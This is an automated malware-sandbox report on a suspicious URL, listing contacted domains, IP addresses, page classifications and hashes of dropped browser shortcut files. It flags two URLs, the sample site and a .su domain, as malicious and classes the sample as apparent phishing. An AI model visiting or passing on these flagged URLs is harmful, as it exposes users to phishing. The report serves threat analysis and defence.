                                                                                                      unknown
                                                                                                      lm.serving-sys.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        unknown
                                                                                                        images-eu.ssl-images-amazon.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          unknown
                                                                                                          odr.mookie1.com
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            unknown
                                                                                                            cookie-matching.mediarithmics.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              unknown
                                                                                                              pixel.rubiconproject.com
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                unknown
                                                                                                                c1.adform.net
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  unknown
                                                                                                                  shoutout.wix.com
                                                                                                                  unknown
                                                                                                                  unknownfalseunknown
                                                                                                                  zi2oykzw.zone.investir-sur-mesure.fr
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    unknown
                                                                                                                    sync-amazon.ads.yieldmo.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      www.amazon.ae
                                                                                                                      unknown
                                                                                                                      unknownfalseunknown
                                                                                                                      usermatch.krxd.net
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        uipglob.semasio.net
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          m.media-amazon.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            image6.pubmatic.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              ogs.google.com
                                                                                                                              unknown
                                                                                                                              unknownfalseunknown
                                                                                                                              match.sharethrough.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                loadus.exelator.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  rtb-csync.smartadserver.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    image2.pubmatic.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      capi.connatix.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        dpm.demdex.net
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          fls-eu.amazon.ae
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            x.bidswitch.net
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              www.facebook.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                beacon.krxd.net
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  tags.bluekai.com
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    pbs.yahoo.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      bs.serving-sys.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        ib.adnxs.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          match.360yield.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            apis.google.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalseunknown
                                                                                                                                                            amazon.partners.tremorhub.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              completion.amazon.ae
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                unknown
                                                                                                                                                                eb2.3lift.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                  https://www.amazon.ae/false
                                                                                                                                                                    unknown
                                                                                                                                                                    https://zi2oykzw.zone.investir-sur-mesure.fr/true
                                                                                                                                                                      unknown
                                                                                                                                                                      https://rsrl.ulvantiro.su/82xG/true
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.google.com/false
                                                                                                                                                                          unknown
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          142.250.186.68
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          142.250.186.67
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          2.18.64.25
                                                                                                                                                                          unknownEuropean Union
                                                                                                                                                                          6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                                                                                                                          52.210.15.1
                                                                                                                                                                          usersync.gumgum.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          54.74.203.172
                                                                                                                                                                          endpoint.prod.eu-west-1.forester.a2z.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          52.57.88.223
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          151.101.1.16
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                          108.129.9.96
                                                                                                                                                                          dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          54.154.220.6
                                                                                                                                                                          euw-ice.360yield.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          52.46.128.147
                                                                                                                                                                          s.amazon-adsystem.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          142.250.185.227
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          142.250.185.106
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          18.184.119.72
                                                                                                                                                                          match-eu-central-1-ecs.sharethrough.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          185.89.211.116
                                                                                                                                                                          ib.anycast.adnxs.comGermany
                                                                                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                                                                                          34.160.236.64
                                                                                                                                                                          tagr-pixel-nginx-odr-euw4.mookie1.comUnited States
                                                                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                                                                          77.243.51.121
                                                                                                                                                                          uip.semasio.netDenmark
                                                                                                                                                                          42697NETIC-ASDKfalse
                                                                                                                                                                          2.23.197.190
                                                                                                                                                                          unknownEuropean Union
                                                                                                                                                                          1273CWVodafoneGroupPLCEUfalse
                                                                                                                                                                          142.250.185.142
                                                                                                                                                                          play.google.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          89.149.193.104
                                                                                                                                                                          rtb-csync-euw1.smartadserver.comNetherlands
                                                                                                                                                                          60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                          151.101.129.16
                                                                                                                                                                          media.amazon.map.fastly.netUnited States
                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                          35.190.80.1
                                                                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          65.9.66.10
                                                                                                                                                                          d2u28gf9o4d1cv.cloudfront.netUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          198.47.127.205
                                                                                                                                                                          pug-ams-bc.pubmnet.comUnited States
                                                                                                                                                                          62713AS-PUBMATICUSfalse
                                                                                                                                                                          34.149.206.255
                                                                                                                                                                          glb-editor.wix.comUnited States
                                                                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                                                                          3.74.185.6
                                                                                                                                                                          adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          34.254.143.3
                                                                                                                                                                          load-euw1.exelator.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          142.250.186.35
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          13.32.121.112
                                                                                                                                                                          public-prod-dspcookiematching.dmxleo.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          52.46.155.104
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          37.157.6.243
                                                                                                                                                                          unknownDenmark
                                                                                                                                                                          198622ADFORMDKfalse
                                                                                                                                                                          52.205.53.110
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                          142.250.185.67
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          142.250.186.34
                                                                                                                                                                          cm.g.doubleclick.netUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          69.173.144.165
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          26667RUBICONPROJECTUSfalse
                                                                                                                                                                          1.1.1.1
                                                                                                                                                                          unknownAustralia
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          74.125.133.84
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          172.217.18.3
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          52.95.122.51
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          67.220.228.178
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          18450WEBNXUSfalse
                                                                                                                                                                          142.250.185.238
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          104.18.36.155
                                                                                                                                                                          ssum-sec.casalemedia.comUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          18.193.91.235
                                                                                                                                                                          crb.kargo.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          52.222.214.42
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          13.32.121.32
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          239.255.255.250
                                                                                                                                                                          unknownReserved
                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                          188.114.97.3
                                                                                                                                                                          unknownEuropean Union
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          104.18.41.104
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          34.251.195.30
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          35.214.207.177
                                                                                                                                                                          envoy-hl.envoy-csync1.core-b8mf.ov1o.comUnited States
                                                                                                                                                                          19527GOOGLE-2USfalse
                                                                                                                                                                          142.250.184.238
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          54.229.104.183
                                                                                                                                                                          sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          35.186.194.101
                                                                                                                                                                          sync.sxp.smartclip.netUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          52.222.236.115
                                                                                                                                                                          dlsq0ztllwnya.cloudfront.netUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          54.36.150.183
                                                                                                                                                                          lb.mediarithmics.comFrance
                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                          154.57.158.115
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          26558FREEWHEELUSfalse
                                                                                                                                                                          35.214.136.108
                                                                                                                                                                          user-data-eu.bidswitch.netUnited States
                                                                                                                                                                          19527GOOGLE-2USfalse
                                                                                                                                                                          52.222.214.103
                                                                                                                                                                          dpgmyeshho1vr.cloudfront.netUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          52.94.216.5
                                                                                                                                                                          unagi-eu.amazon.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          172.67.40.173
                                                                                                                                                                          spl.zeotap.comUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          172.217.18.14
                                                                                                                                                                          www3.l.google.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          142.250.186.174
                                                                                                                                                                          plus.l.google.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          216.58.206.78
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          172.64.151.101
                                                                                                                                                                          dsum-sec.casalemedia.comUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          34.233.69.206
                                                                                                                                                                          fien-198008767.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                          142.250.181.234
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          35.244.159.8
                                                                                                                                                                          us-u.openx.netUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          87.248.119.252
                                                                                                                                                                          edge.gycpi.b.yahoodns.netUnited Kingdom
                                                                                                                                                                          203220YAHOO-DEBDEfalse
                                                                                                                                                                          35.186.196.148
                                                                                                                                                                          sync.rfp.fout.jpUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          3.77.62.68
                                                                                                                                                                          adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          142.250.184.206
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          157.240.252.35
                                                                                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                          216.58.212.170
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          142.250.186.138
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          142.250.186.163
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          3.253.177.216
                                                                                                                                                                          completion.amazon.co.ukUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          216.58.206.67
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          185.64.190.78
                                                                                                                                                                          pugm-lhrc.pubmnet.comUnited Kingdom
                                                                                                                                                                          62713AS-PUBMATICUSfalse
                                                                                                                                                                          52.222.237.219
                                                                                                                                                                          c.media-amazon.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          54.169.228.246
                                                                                                                                                                          match-ap-southeast-1-ecs.sharethrough.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          142.250.185.138
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          216.58.206.68
                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          52.223.22.214
                                                                                                                                                                          us-east-eb2.3lift.comUnited States
                                                                                                                                                                          8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                          67.220.226.238
                                                                                                                                                                          aax-eu.amazon-adsystem.comUnited States
                                                                                                                                                                          18450WEBNXUSfalse
                                                                                                                                                                          50.57.31.206
                                                                                                                                                                          uipus.semasio.netUnited States
                                                                                                                                                                          19994RACKSPACEUSfalse
                                                                                                                                                                          188.114.96.3
                                                                                                                                                                          rsrl.ulvantiro.suEuropean Union
                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                          149.202.238.105
                                                                                                                                                                          rtb-csync-euw2.smartadserver.comFrance
                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                          172.217.16.131
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          35.190.24.218
                                                                                                                                                                          rd.frontend.weborama.frUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          IP
                                                                                                                                                                          192.168.2.17
                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                          Analysis ID:1502584
                                                                                                                                                                          Start date and time:2024-09-02 03:28:26 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                          Sample URL:https://zi2oykzw.zone.investir-sur-mesure.fr/
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:19
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          Analysis Mode:stream
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal68.phis.win@20/126@171/345
                                                                                                                                                                          • Exclude process from analysis (whitelisted): SIHClient.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.184.206, 74.125.133.84, 34.104.35.123, 142.250.186.138, 142.250.186.67, 216.58.212.170, 142.250.185.74, 142.250.184.202, 142.250.185.106, 172.217.16.138, 142.250.181.234, 216.58.206.74, 142.250.185.234, 172.217.18.10, 142.250.186.74, 172.217.16.202, 216.58.206.42, 142.250.186.42, 172.217.23.106, 142.250.186.106
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          InputOutput
                                                                                                                                                                          URL: https://zi2oykzw.zone.investir-sur-mesure.fr/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["unknown"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"unknown",
                                                                                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          URL: https://www.google.com/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["Gmail",
                                                                                                                                                                          "Google"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"Sign in",
                                                                                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          URL: https://www.google.com/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["Google"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"Sign in",
                                                                                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          URL: https://www.google.com/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["Google"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"Sign in",
                                                                                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          URL: https://zi2oykzw.zone.investir-sur-mesure.fr/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["unknown"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"unknown",
                                                                                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          URL: https://www.amazon.ae/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["amazon"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"unknown",
                                                                                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          URL: https://www.amazon.ae/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["amazon"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"sign in",
                                                                                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          URL: https://www.amazon.ae/ Model: jbxai
                                                                                                                                                                          {
                                                                                                                                                                          "brand":["all audio",
                                                                                                                                                                          "beauty & perfumes",
                                                                                                                                                                          "grooming gadgets",
                                                                                                                                                                          "televisions",
                                                                                                                                                                          "smartwatches",
                                                                                                                                                                          "all laptops",
                                                                                                                                                                          "2 in 1",
                                                                                                                                                                          "personal care",
                                                                                                                                                                          "nutrition & supplements",
                                                                                                                                                                          "cameras",
                                                                                                                                                                          "audio",
                                                                                                                                                                          "gaming",
                                                                                                                                                                          "true wireless",
                                                                                                                                                                          "gaming tablets"],
                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                          "prominent_button_name":"unknown",
                                                                                                                                                                          "text_input_field_labels":["see more",
                                                                                                                                                                          "see more",
                                                                                                                                                                          "see more",
                                                                                                                                                                          "see more",
                                                                                                                                                                          "see more",
                                                                                                                                                                          "see personalized recommendations",
                                                                                                                                                                          "sign in",
                                                                                                                                                                          "new customer? start here"],
                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 2 00:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                          Entropy (8bit):3.997483950556547
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:0DCC1D0FF0C766F43417A90B2FC0416C
                                                                                                                                                                          SHA1:551BF3C18356D06618679BF2148E44DE6FB1698D
                                                                                                                                                                          SHA-256:204C47F758028CFDFA22F8AF596BB89D729D7228A4F39356DED45EF6164B2E57
                                                                                                                                                                          SHA-512:05D1FA4AB57BE95706199083991E10EC5F0450A6349EA9E118676F2C6A7943CF4D15D0ED4427C5F0B27082489A6249B55742DF405EDC22602C5442E33AD5737C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......&{........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I"Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V"Y......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V"Y.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V"Y.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 2 00:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                          Entropy (8bit):4.011837091077189
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D64D1C7D2FCD63F50687F9169EB9A61D
                                                                                                                                                                          SHA1:02C28F0BCDBF116D14FE93816930FC12AE6152AC
                                                                                                                                                                          SHA-256:A026BE4CFEDFF0CC123918A54C84AC7E7327031F91DC7C36015FB33B8D9D5367
                                                                                                                                                                          SHA-512:086347977933EDB425A83342598F7AEAE1863DF9949B5312B5D2FB264995CF6E0DCA7A16C5AA731ED011EF7C00B368DCCA04BE9884F95E6A47F933E2BCB055C1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....8.{........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I"Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V"Y......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V"Y.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V"Y.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2693
                                                                                                                                                                          Entropy (8bit):4.018062699229535
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:8E3FB493F49BFE843472CA06C02BD2C0
                                                                                                                                                                          SHA1:A2755562F467C0E5219DB75BADF32C5715999DF9
                                                                                                                                                                          SHA-256:7F70C3DB69E4126766CA2C86F7AB721B046774D4CECE1D0BCE9D2A3F6AB65646
